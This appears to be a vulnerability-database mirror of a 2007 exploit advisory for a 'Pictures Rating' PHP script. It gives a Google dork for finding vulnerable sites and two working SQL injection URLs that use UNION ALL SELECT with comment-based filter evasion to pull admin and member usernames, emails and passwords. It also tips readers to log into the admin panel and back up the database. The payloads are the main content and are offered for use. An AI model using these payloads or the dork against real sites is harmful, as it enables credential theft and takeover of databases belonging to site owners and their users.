Lucene search

K

prmsgid-sql.txt

🗓️ 19 Jul 2007 00:00:00Reported by t0pp8uzzType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

Pictures Rating SQL Injection Vulnerbility. Pull out admin/members info. Exploit requires registration

Show more
Code
`--==+================================================================================+==--  
--==+ Pictures Rating SQL Injection Vulnerbility +==--  
--==+================================================================================+==--  
  
  
  
AUTHOR: t0pP8uZz & xprog  
SITE: N/A  
DORK: allintext:"Latest Pictures" Name Gender Profile Rating  
  
  
DESCRIPTION:  
pull out admin/members info  
  
  
EXPLOITS:  
http://server.com/Script_Dir/index.php?cmd=8&msgid=52/**/UNION/**/ALL/**/SELECt/**/1,2,@@version,concat(0x3c623e,username,0x3a,password,0x3c623e),5,6,7/**/FROM/**/admin/*  
http://server.com/Script_Dir/index.php?cmd=8&msgid=52/**/UNION/**/ALL/**/SELECt/**/1,2,@@version,concat(0x3c623e,username,0x3a,email,0x3a,password,0x3c623e),5,6,7/**/FROM/**/members/*  
  
  
NOTE/TIP:  
you must register first  
admin login is at /admin/ you can backup the DB there.  
  
  
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net/G0t-Root.org !  
  
  
--==+================================================================================+==--  
--==+ Pictures Rating SQL Injection Vulnerbility +==--  
--==+================================================================================+==--  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
19 Jul 2007 00:00Current
7.4High risk
Vulners AI Score7.4
25
.json
Report